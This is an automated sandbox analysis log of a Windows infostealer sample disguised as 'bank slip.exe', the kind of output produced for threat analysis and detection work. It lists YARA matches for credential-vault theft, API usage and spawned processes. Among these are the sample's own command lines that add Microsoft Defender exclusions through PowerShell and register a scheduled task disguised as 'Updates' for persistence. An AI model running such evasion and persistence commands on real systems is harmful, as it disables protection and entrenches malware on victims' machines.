                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_074BC19011_2_074BC190
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_074B004011_2_074B0040
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_074B000611_2_074B0006
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeCode function: 11_2_07623A2011_2_07623A20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_02E7A3E014_2_02E7A3E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_02E741F814_2_02E741F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_02E7D77814_2_02E7D778
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_02E74AC814_2_02E74AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_02E73EB014_2_02E73EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD8EB314_2_05CD8EB3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CDC02014_2_05CDC020
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CDE02014_2_05CDE020
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD0D3814_2_05CD0D38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD533014_2_05CD5330
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05CD5A1014_2_05CD5A10
                        Source: bank slip.exeStatic PE information: invalid certificate
                        Source: bank slip.exe, 00000000.00000002.2075170107.0000000006A80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename922eeda8-5113-4aeb-9b31-a4e56d848d57.exe4 vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000000.1982387453.0000000000262000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename922eeda8-5113-4aeb-9b31-a4e56d848d57.exe4 vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000002.2046567402.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs bank slip.exe
                        Source: bank slip.exe, 00000000.00000002.2076413089.0000000009869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
                        Source: bank slip.exeBinary or memory string: OriginalFilenameNjBW.exe( vs bank slip.exe
                        Source: bank slip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.bank slip.exe.389c998.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.bank slip.exe.38d7bb8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 11.2.mKSjGvfmIulVB.exe.4318670.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 11.2.mKSjGvfmIulVB.exe.42dd450.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.bank slip.exe.38d7bb8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: bank slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: mKSjGvfmIulVB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.bank slip.exe.5140000.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, 9O2OLI.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, hdYUG.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, LGBZ4N2f.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, F8OmG.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.bank slip.exe.389c998.7.raw.unpack, Bgo.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, sfsXZwXfvR3dieCKhH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.bank slip.exe.39b1e08.5.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, sfsXZwXfvR3dieCKhH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.bank slip.exe.6a80000.11.raw.unpack, RYNQdoLFBlDdX1Oj8U.csSecurity API names: _0020.AddAccessRule
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                        Source: C:\Users\user\Desktop\bank slip.exeFile created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeMutant created: \Sessions\1\BaseNamedObjects\EdtZvPE
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3092:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                        Source: C:\Users\user\Desktop\bank slip.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2859.tmpJump to behavior
                        Source: bank slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: bank slip.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\bank slip.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: bank slip.exeReversingLabs: Detection: 23%
                        Source: bank slip.exeVirustotal: Detection: 33%
                        Source: C:\Users\user\Desktop\bank slip.exeFile read: C:\Users\user\Desktop\bank slip.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\bank slip.exe "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                        Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\bank slip.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exeSection loaded: uxtheme.dllJump to behavior
